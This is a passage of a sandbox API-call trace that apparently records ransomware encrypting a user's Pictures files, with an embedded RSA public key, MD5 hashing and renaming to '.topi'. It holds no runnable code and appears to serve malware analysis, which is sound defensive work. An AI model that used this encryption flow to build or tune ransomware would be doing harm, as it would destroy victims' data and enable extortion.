[0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94f8 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94e0 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94b0 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9498 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1c80 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.458] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0xd342, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0xd342, lpOverlapped=0x0) returned 1 [0095.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.458] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd347, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.458] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.459] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.459] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.459] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.459] CloseHandle (hObject=0x6a8) returned 1 [0095.463] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.463] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0095.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.463] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cmf8FY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cmf8fy.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cmf8FY.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cmf8fy.jpg.topi")) returned 1 [0095.464] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.464] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.464] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.466] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.466] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0095.466] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.466] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.466] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.466] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned=".ini" [0095.466] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.466] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb73f55a0, ftCreationTime.dwHighDateTime=0x1d5be50, ftLastAccessTime.dwLowDateTime=0xb85a9130, ftLastAccessTime.dwHighDateTime=0x1d5bc01, ftLastWriteTime.dwLowDateTime=0xb85a9130, ftLastWriteTime.dwHighDateTime=0x1d5bc01, nFileSizeHigh=0x0, nFileSizeLow=0x96ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dQ6AzVpOnvDz9H9B3b_.png", cAlternateFileName="DQ6AZV~1.PNG")) returned 1 [0095.466] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.466] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.466] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.466] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dQ6AzVpOnvDz9H9B3b_.png") returned=".png" [0095.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dQ6AzVpOnvDz9H9B3b_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dq6azvponvdz9h9b3b_.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.466] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=38574) returned 1 [0095.466] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.469] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x9688, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.469] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.470] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.470] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x96ae, lpOverlapped=0x0) returned 1 [0095.470] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.470] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.470] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.470] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0095.471] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.471] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.471] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.472] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.472] GetLastError () returned 0x0 [0095.472] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.472] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0095.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.472] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.472] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.472] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x96b0) returned 0x99f72d8 [0095.472] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1c80 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9498 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1cc8 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94b0 [0095.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94e0 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94f8 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.473] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94e0 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94f8 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d94f8 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d94e0 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94f8 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94e0 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.474] GetCurrentThreadId () returned 0x8c4 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6340 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.474] GetCurrentThreadId () returned 0x8c4 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94e0 [0095.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94f8 [0095.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94c8 [0095.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.476] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dQ6AzVpOnvDz9H9B3b_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dq6azvponvdz9h9b3b_.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dQ6AzVpOnvDz9H9B3b_.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dq6azvponvdz9h9b3b_.png.topi")) returned 1 [0095.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.477] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.478] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.478] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212a7180, ftCreationTime.dwHighDateTime=0x1d5c03f, ftLastAccessTime.dwLowDateTime=0x840be040, 